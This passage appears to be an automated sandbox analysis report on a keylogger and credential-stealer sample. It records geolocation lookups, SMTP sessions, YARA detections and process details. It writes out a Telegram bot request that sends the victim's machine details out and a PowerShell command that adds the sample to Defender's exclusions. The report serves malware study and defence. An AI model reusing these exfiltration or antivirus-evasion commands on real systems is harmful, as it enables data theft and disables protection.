                                                            2024-09-26 11:44:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-26 11:44:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.749715188.114.96.34434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:18 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-26 11:44:18 UTC682INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:18 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 15890
                                                            Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LuSrCTKDRKTeQSV%2FiHedFrhp9koVPsUXLnDRs%2BAlIvTY8h6yByNzIML%2B4gRuDoJh9ubfHts0N8%2FW1q7yE2KBIi9%2BfFaAmTqWTYTn61ABu3uJJ3GhPerGqA3M4Vpt5oW77lY%2FZAGO"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c930051fa8d41f8-EWR
                                                            2024-09-26 11:44:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-26 11:44:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.749719188.114.96.34434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-26 11:44:19 UTC680INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:19 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 15891
                                                            Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ta10nn%2BDzwXvJ%2FTLgcaxoRHkJEzmz20qAZvWTiHNe7B%2F5DqNp75AdrCvegReu5gueoHDueBqMbsAfr0N%2F1pKUqqkjLnp6wfmkowXOfFNcUpfeAjcGDzLHmb0%2B2ytbCL8QJZwjaLg"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c93005baf5b41f9-EWR
                                                            2024-09-26 11:44:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-26 11:44:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.749723188.114.96.34434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-26 11:44:21 UTC678INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:21 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 15893
                                                            Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47GWzNNImlpZWqPJZVoTEC9Vwuih2ZHH4H0HjDzYJEgoFETGqgwNhcjJCeGAQ2iXm%2BHRCzScYojsthVVWyyyRenblUptJnlrg0G62g%2BLLqYldjdSzl%2F1EqYNw0hO%2F6eqTwnx7hSe"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c9300669a409e08-EWR
                                                            2024-09-26 11:44:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-26 11:44:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.749725188.114.96.34434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:22 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-26 11:44:23 UTC674INHTTP/1.1 200 OK
                                                            Date: Thu, 26 Sep 2024 11:44:23 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 15895
                                                            Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hw8pXxY4A3xTg8ZzHvmzx3pR7PU3W4abzGYGcH40eZS6jfZrR2rkFKYxg6A%2B3oL54uNBMFplCBH53dRUZWy9cQmlWlH6ddMVS2SwziMr%2F9pUC6ZSu54u4Q3zswuHJF2T7RXxuQfb"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c9300700e6417bd-EWR
                                                            2024-09-26 11:44:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-26 11:44:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.749726149.154.167.2204434888C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-26 11:44:23 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
                                                            2024-09-26 11:44:24 UTC344INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0
                                                            Date: Thu, 26 Sep 2024 11:44:23 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 55
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-09-26 11:44:24 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                            Sep 26, 2024 13:44:30.181189060 CEST58749727217.12.218.219192.168.2.7220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:44:30 +0200
                                                            Sep 26, 2024 13:44:30.181605101 CEST49727587192.168.2.7217.12.218.219EHLO 528110
                                                            Sep 26, 2024 13:44:30.353322983 CEST58749727217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:44:30.353725910 CEST49727587192.168.2.7217.12.218.219STARTTLS
                                                            Sep 26, 2024 13:44:30.526225090 CEST58749727217.12.218.219192.168.2.7220 TLS go ahead
                                                            Sep 26, 2024 13:44:42.027044058 CEST58749728217.12.218.219192.168.2.7220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:44:41 +0200
                                                            Sep 26, 2024 13:44:42.027209997 CEST49728587192.168.2.7217.12.218.219EHLO 528110
                                                            Sep 26, 2024 13:44:42.462924004 CEST58749728217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:44:42.463134050 CEST58749728217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:44:42.463447094 CEST49728587192.168.2.7217.12.218.219STARTTLS
                                                            Sep 26, 2024 13:44:42.641243935 CEST58749728217.12.218.219192.168.2.7220 TLS go ahead
                                                            Sep 26, 2024 13:45:04.337904930 CEST58749730217.12.218.219192.168.2.7220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:45:04 +0200
                                                            Sep 26, 2024 13:45:04.338134050 CEST49730587192.168.2.7217.12.218.219EHLO 528110
                                                            Sep 26, 2024 13:45:04.515001059 CEST58749730217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:45:04.515197039 CEST49730587192.168.2.7217.12.218.219STARTTLS
                                                            Sep 26, 2024 13:45:04.696432114 CEST58749730217.12.218.219192.168.2.7220 TLS go ahead
                                                            Sep 26, 2024 13:45:43.437735081 CEST58749732217.12.218.219192.168.2.7220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:45:43 +0200
                                                            Sep 26, 2024 13:45:43.437992096 CEST49732587192.168.2.7217.12.218.219EHLO 528110
                                                            Sep 26, 2024 13:45:43.609600067 CEST58749732217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:45:43.612732887 CEST49732587192.168.2.7217.12.218.219STARTTLS
                                                            Sep 26, 2024 13:45:43.786331892 CEST58749732217.12.218.219192.168.2.7220 TLS go ahead
                                                            Sep 26, 2024 13:46:08.763739109 CEST58749733217.12.218.219192.168.2.7220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:46:08 +0200
                                                            Sep 26, 2024 13:46:08.763890028 CEST49733587192.168.2.7217.12.218.219EHLO 528110
                                                            Sep 26, 2024 13:46:08.935470104 CEST58749733217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:46:08.935610056 CEST49733587192.168.2.7217.12.218.219STARTTLS
                                                            Sep 26, 2024 13:46:09.107906103 CEST58749733217.12.218.219192.168.2.7220 TLS go ahead
                                                            Sep 26, 2024 13:46:36.373044014 CEST58749734217.12.218.219192.168.2.7220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:46:36 +0200
                                                            Sep 26, 2024 13:46:36.373198986 CEST49734587192.168.2.7217.12.218.219EHLO 528110
                                                            Sep 26, 2024 13:47:02.071041107 CEST58749735217.12.218.219192.168.2.7220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:47:01 +0200
                                                            Sep 26, 2024 13:47:02.071749926 CEST49735587192.168.2.7217.12.218.219EHLO 528110
                                                            Sep 26, 2024 13:47:02.243545055 CEST58749735217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:47:02.243671894 CEST49735587192.168.2.7217.12.218.219STARTTLS
                                                            Sep 26, 2024 13:47:43.573765039 CEST58749738217.12.218.219192.168.2.7220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:47:43 +0200
                                                            Sep 26, 2024 13:47:43.574301958 CEST49738587192.168.2.7217.12.218.219EHLO 528110
                                                            Sep 26, 2024 13:47:43.745894909 CEST58749738217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:47:43.746234894 CEST49738587192.168.2.7217.12.218.219STARTTLS
                                                            Sep 26, 2024 13:47:55.490883112 CEST58749739217.12.218.219192.168.2.7220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:47:55 +0200
                                                            Sep 26, 2024 13:47:55.491156101 CEST49739587192.168.2.7217.12.218.219EHLO 528110
                                                            Sep 26, 2024 13:47:55.944158077 CEST58749739217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:47:55.944339991 CEST49739587192.168.2.7217.12.218.219STARTTLS
                                                            Sep 26, 2024 13:47:55.944634914 CEST58749739217.12.218.219192.168.2.7250-h2-eu1.layer6.net Hello 528110 [8.46.123.33]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPECONNECT
                                                            250-AUTH PLAIN LOGIN CRAM-MD5
                                                            250-CHUNKING
                                                            250-STARTTLS
                                                            250 HELP
                                                            Sep 26, 2024 13:47:56.117739916 CEST58749739217.12.218.219192.168.2.7220 TLS go ahead

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:07:44:01
                                                            Start date:26/09/2024
                                                            Path:C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
                                                            Imagebase:0xe60000
                                                            File size:684'032 bytes
                                                            MD5 hash:401098A467FC699ACB2D256DA47FDACE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:07:44:02
                                                            Start date:26/09/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
                                                            Imagebase:0x110000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:07:44:02
                                                            Start date:26/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:07:44:02
                                                            Start date:26/09/2024
                                                            Path:C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
                                                            Imagebase:0xd90000
                                                            File size:684'032 bytes
                                                            MD5 hash:401098A467FC699ACB2D256DA47FDACE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:12
                                                            Start time:07:44:05
                                                            Start date:26/09/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff7fb730000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:8.3%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:44
                                                              Total number of Limit Nodes:5
                                                              execution_graph 17934 3084668 17935 3084669 17934->17935 17936 3084686 17935->17936 17938 3084779 17935->17938 17939 308477c 17938->17939 17943 3084888 17939->17943 17947 3084879 17939->17947 17944 3084889 17943->17944 17945 308498c 17944->17945 17951 30844b4 17944->17951 17949 308487c 17947->17949 17948 308498c 17949->17948 17950 30844b4 CreateActCtxA 17949->17950 17950->17948 17952 3085918 CreateActCtxA 17951->17952 17954 30859db 17952->17954 17972 ab114e0 17973 ab1166b 17972->17973 17974 ab11506 17972->17974 17974->17973 17977 ab11760 PostMessageW 17974->17977 17979 ab11758 17974->17979 17978 ab117cc 17977->17978 17978->17974 17980 ab1175d PostMessageW 17979->17980 17981 ab117cc 17980->17981 17981->17974 17955 308d340 17956 308d345 17955->17956 17960 308d50f 17956->17960 17964 308d520 17956->17964 17957 308d473 17961 308d51c 17960->17961 17963 308d54e 17961->17963 17968 308d0b8 17961->17968 17963->17957 17965 308d521 17964->17965 17966 308d0b8 DuplicateHandle 17965->17966 17967 308d54e 17966->17967 17967->17957 17969 308d588 DuplicateHandle 17968->17969 17971 308d61e 17969->17971 17971->17963 17982 308afb0 17983 308afb1 17982->17983 17986 308b0a8 17983->17986 17984 308afbf 17987 308b0dc 17986->17987 17988 308b0b9 17986->17988 17987->17984 17988->17987 17989 